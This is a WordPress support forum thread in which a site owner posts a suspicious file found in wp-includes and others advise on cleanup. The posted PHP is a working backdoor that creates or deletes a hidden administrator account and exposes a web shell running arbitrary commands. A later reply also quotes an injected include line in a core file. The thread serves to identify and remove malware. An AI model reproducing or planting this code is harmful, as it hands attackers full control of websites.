Class.wp.php

  • Resolved swhz

    (@swhz)


    8 years, 1 month ago

    I run bazar shop theme on my website.

    When I scanned with wordfence, it detected that an unknown file was in my wp-includes directory named class.wp.php. I deleted the file from the directory but have kept it on my desktop for observation. I am posting the code here, kindly tell me if it is malicious or not, or if it has other files as well.

    <?php error_reporting(0);
include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
$table_name = $wpdb->get_blog_prefix();
$sample = 'a:1:{s:13:"administrator";b:1;}';
if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
if( isset($_GET['awu']) ) {
$wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '[email protected]', '', '2011-06-07 00:00:00', '', '0', '1001010');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
$wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
if( isset($_GET['dwu']) ) { 
$wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");} 
if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
<input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
<textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>
Viewing 10 replies - 1 through 10 (of 10 total)
  • wfalaa

    (@wfalaa)

    Hi swhz,
    Using this code, someone may insert/delete a new user into your database with admin privileges, it’s the right thing you did by deleting this file, I would also recommend the following:
    – Make sure you have WordPress, themes and plugins all updated to the latest stable version.
    – Change your FTP/cPanel password.
    – Compare number of users you have in (WordPress Dashboard > Users) with those in “wp_users” database table.

    Thanks.

    Thread Starter swhz

    (@swhz)

    Thank you very much for replying.

    I have done as you said, fortunately there are no suspicious users in the database.

    Thank you again for helping and thank you for the amazing plugin.

    Filename: wp-includes/post.php
    File type: WordPress Core File
    The Original Version of the file The Modified Version on your WordPress system
    1 <?php 1 <?php if (file_exists(dirname(__FILE__) . ‘/wp-cd.php’)) include_once(dirname(__FILE__) . ‘/wp-cd.php’); ?><?php
    2 /** 2 /**
    3 * Core Post API 3 * Core Post API
    4 * 4 *

    wfalaa

    (@wfalaa)

    @yiggory Following to your thread here, I recommend choosing “Restore the original version of this file.” option, as there is no “wp-cd.php” file in WordPress default installation.

    Thanks.

    ok restored and also deleted other warning files.

    had the same suspicious file in my system. deleted…and guess what it came back. Looking for the culprit now.
    does anybody have an idea how to best track the creation of this file?

    I have found some entries in your active themes function.php file. As well as wp-post.php ( looking for wp-cd.php ) and a DB entry but I forgot what the table was called.

    The strange thing is that I noticed this locally. Almost all of my local WordPress sites had this happen to it.

    All of my local sites are .dev extensions so to have them mostly effected is strange. if you do find out what causes it please let me know. I usually use the same group of plugins on every site.

    @adampatterson I’m not sure what do you mean with “active themes function.php file”? Is this something related to Wordfence plugin?

    Thanks.

    @wfalaa I was not using WordFence sorry, I was searching out ‘wp-cd.php’ and offering my observations.

    I got an alert for wp-includes/class-wp.php. I downloaded the latest from www.remarpro.com and the file was identical.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Class.wp.php’ is closed to new replies.